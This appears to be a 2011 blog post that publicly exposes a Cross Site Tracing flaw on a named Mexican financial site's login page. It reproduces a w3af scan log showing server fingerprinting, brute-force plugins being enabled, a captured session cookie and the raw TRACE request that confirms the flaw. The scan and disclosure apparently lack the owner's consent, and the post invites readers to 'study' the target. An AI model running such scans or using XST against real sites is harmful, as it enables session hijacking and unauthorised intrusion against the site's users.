Friday, May 27, 2011

Cross Site Tracing see.sbi.com.mx/invernet2000/Login.jsp

Greetings, Free World.

Here is another one for you to study.

https://see.sbi.com.mx/invernet2000/Login.jsp

[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:02:05 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:02:09 PM CDT] The page language is: es
[Thu 26 May 2011 10:02:10 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:11 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Found 1 URLs and 1 different points of injection.
[Thu 26 May 2011 10:02:11 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp
[Thu 26 May 2011 10:02:11 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp | Method: GET
[Thu 26 May 2011 10:02:11 PM CDT] The web application sent a persistent cookie.
[Thu 26 May 2011 10:02:11 PM CDT] This is the information about the SSL certificate used in the target site:
- Digest (SHA-1): F1:D9:65:32:E0:B3:92:49:1F:F8:82:4C:0C:83:1D:F7:6D:40:47:E6
- Digest (MD5): 1E:39:62:29:82:A3:A6:61:A6:BA:E1:23:87:FB:97:68
- Serial#: 52710929251855116405284257897386420621
- Version: 2
- Expired: No
- Subject:
- Issuer:
- PKey bits: 1024
- PKey type: RSA (6)
- Certificate dump:

[Thu 26 May 2011 10:02:12 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:12 PM CDT] The URL "https://see.sbi.com.mx/invernet2000/" has the following allowed methods: GET, HEAD, OPTIONS, POST, TRACE. This information was found in the request with id 17.
[Thu 26 May 2011 10:02:12 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent the cookie: "JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/". This information was found in the request with id 1.
[Thu 26 May 2011 10:03:26 PM CDT] Too many retries (2) while requesting: https://see.sbi.com.mx/invernet2000/
[Thu 26 May 2011 10:03:28 PM CDT] The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40.
[Thu 26 May 2011 10:03:30 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent these cookies:
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3; Path=/
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/
[Thu 26 May 2011 10:03:30 PM CDT] Finished scanning process.


xst=xst

The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40


TRACE https://see.sbi.com.mx/invernet2000/ HTTP/1.1
Host: see.sbi.com.mx
Cookie: Path=/; JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net


Greetings, Free World.
